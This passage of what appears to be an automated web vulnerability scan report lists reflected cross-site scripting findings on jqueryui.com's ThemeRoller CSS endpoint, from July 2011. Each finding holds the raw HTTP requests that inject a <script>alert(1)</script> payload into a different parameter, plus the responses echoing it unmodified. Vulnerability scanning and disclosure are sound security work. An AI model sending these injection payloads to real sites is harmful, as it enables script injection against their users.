GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=9999993fbde<script>alert(1)</script>8b0960fee62&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:36 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=9999993fbde<script>alert(1)</script>8b0960fee62&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
...[SNIP]...

3.125. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadius request parameter is copied into the HTML document as plain text between tags. The payload 6bcef<script>alert(1)</script>c81373b8746 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6bcef<script>alert(1)</script>c81373b8746&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 18344


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6bcef<script>alert(1)</script>c81373b8746&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.126. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the ctl request parameter is copied into the HTML document as plain text between tags. The payload ff82e<script>alert(1)</script>ca3ce063aa0 was submitted in the ctl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themerollerff82e<script>alert(1)</script>ca3ce063aa0&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:28 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17278


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themerollerff82e<script>alert(1)</script>ca3ce063aa0&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=
...[SNIP]...

3.127. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcActive request parameter is copied into the HTML document as plain text between tags. The payload c5b7b<script>alert(1)</script>716f2567758 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121c5b7b<script>alert(1)</script>716f2567758&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:03 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17499


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121c5b7b<script>alert(1)</script>716f2567758&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget
...[SNIP]...

3.128. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcContent request parameter is copied into the HTML document as plain text between tags. The payload 3ef0a<script>alert(1)</script>b19580104ec was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222223ef0a<script>alert(1)</script>b19580104ec&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:32 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222223ef0a<script>alert(1)</script>b19580104ec&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.129. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcDefault request parameter is copied into the HTML document as plain text between tags. The payload 85413<script>alert(1)</script>721d2b2bd14 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=55555585413<script>alert(1)</script>721d2b2bd14&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:34 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=55555585413<script>alert(1)</script>721d2b2bd14&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component co
...[SNIP]...

3.130. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHeader request parameter is copied into the HTML document as plain text between tags. The payload 4be2a<script>alert(1)</script>b9f0265ae0b was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222224be2a<script>alert(1)</script>b9f0265ae0b&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:30 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222224be2a<script>alert(1)</script>b9f0265ae0b&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.131. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHover request parameter is copied into the HTML document as plain text between tags. The payload b04a7<script>alert(1)</script>bbbf43f1841 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121b04a7<script>alert(1)</script>bbbf43f1841&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
